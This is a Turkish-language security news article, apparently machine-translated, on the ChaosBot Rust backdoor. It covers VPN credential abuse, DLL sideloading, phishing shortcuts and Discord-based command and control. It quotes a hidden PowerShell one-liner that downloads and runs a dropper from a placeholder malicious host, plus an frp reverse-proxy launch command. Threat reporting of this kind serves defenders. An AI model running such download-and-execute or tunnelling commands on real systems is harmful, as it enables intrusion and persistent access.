ChaosBot, kurumsal ağları hedef alan gelişmiş Rust tabanlı bir arka kapı olarak Eylül 2025’in sonlarında ortaya çıktı. İlk araştırmalar, tehdit aktörlerinin, aşırı ayrıcalıklı Active Directory hizmet hesaplarıyla birlikte ele geçirilen CiscoVPN kimlik bilgilerini kullanarak giriş elde ettiğini ortaya çıkardı.
İçeri girdikten sonra ChaosBot, yasal Microsoft Edge bileşeni kullanılarak yandan yükleme teknikleri aracılığıyla gizlice dağıtıldı. kimlik_helper.exe itibaren C:\Users\Public\Libraries dizin.
Kötü amaçlı yazılımın Rust uygulaması ve komuta ve kontrol (C2) operasyonlarında Discord’a güvenmesi, modern geliştirme uygulamaları ile kötüye kullanılan ana akım hizmetlerin yenilikçi bir karışımının altını çiziyor.
eSentire analistleri, ChaosBot’un arkasındaki tehdit aktörünün “chaos_00019” adlı bir Discord profili aracılığıyla faaliyet gösterdiğini ve bunun, popüler sosyal platformlar içindeki iletişimi kasıtlı olarak maskelemeye yönelik bir girişim olduğunu öne sürdüğünü belirtti.
Mağdur demografisi, Vietnamca konuşulan ortamlara odaklanıldığını gösteriyor, ancak farklı hedefler üzerinde yanal hareket deneyleri gözlemlendi.
.webp)
VPN kimlik bilgilerinin kötüye kullanılması ve aşırı ayrıcalıklı AD hesaplarının birleşimi, kusursuz WMI tabanlı uzaktan yürütmeyi mümkün kıldı ve tespit edilmeden önce yaygın dağıtımı kolaylaştırdı.
İlk uzlaşmanın ardından ChaosBot keşif gerçekleştirir ve kalıcı erişimi sürdürmek için hızlı bir ters proxy (frp) tüneli kurar.
Kötü amaçlı yazılım indirmeleri frp ve yapılandırma dosyası (node.ini) içine C:\Users\Public\Musicardından proxy’yi PowerShell tarafından yürütülen bir kabuk komutu aracılığıyla başlatır: –
powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; C:\Users\Public\Music\node.exe -c C:\Users\Public\Music\node.ini"Bu sıra, 7000 numaralı bağlantı noktası üzerinden uzak bir AWS ana bilgisayarına gizli bir iletişim kanalı oluşturarak çevre savunmalarını atlar ve sonraki yanal hareketleri destekler.
Enfeksiyon Mekanizması
ChaosBot’un temel enfeksiyon mekanizması iki ana vektörden yararlanır: kimlik bilgilerine dayalı erişim ve kötü amaçlı Windows kısayolları.
İlkinde, geçerli CiscoVPN kimlik bilgileri ve “serviceaccount” adlı aşırı ayrıcalıklı bir AD hesabı, ChaosBot yükünü bırakan ve yürüten WMI komutlarını çalıştırmak için kullanılır (msedge_elf.dll) uzak ana bilgisayarlarda.
Kısayol vektörü, aşağıdakileri içeren kimlik avı e-postalarını içerir: .lnk Kullanıcının dikkatini dağıtmak için Vietnam Devlet Bankası temalı bir tuzak PDF açarken ChaosBot’u getirip başlatmak için tek satırlık bir PowerShell çalıştıran dosyalar.
.webp)
Bu PowerShell komutu şuna benzer:
powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://malicious-domain/dropper.exe' -OutFile $env:Temp\chaosbot.exe; Start-Process $env:Temp\chaosbot.exe"Yürütmenin ardından ChaosBot, yerleşik Discord bot jetonunu bir GET isteğiyle doğrular. https://discord.com/api/v10/users/@meardından POST kullanarak kurbanın ana bilgisayar adının adını taşıyan özel bir kanal oluşturur. https://discord.com/api/v10/guilds/.
Discord mesajlarından getirilen sonraki kabuk komutları, çıktı bütünlüğünü korumak için UTF-8 kodlama direktifleri ön eki eklenmiş yeni PowerShell işlemlerinde yürütülür.
Stdout, stderr, ekran görüntüleri veya dosya ekleri de dahil olmak üzere sonuçlar, çok parçalı/form verili POST istekleri aracılığıyla tehdit aktörünün Discord kanalına döndürülür.
Bu ikili vektör yaklaşımı (kimlik bilgilerinin kötüye kullanılması ve kötü amaçlı kısayollar kullanan sosyal mühendislik) C2 için meşru hizmetlerin kullanımıyla birleştiğinde, ChaosBot’un tespit edilmesi ve düzeltilmesi özellikle zor hale geliyor.
Yerleşik Windows ikili dosyaları ve titiz kodlama uygulamaları aracılığıyla gizlenen varlıklar, hedeflenen ortamlardaki varlığını daha da gizler.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
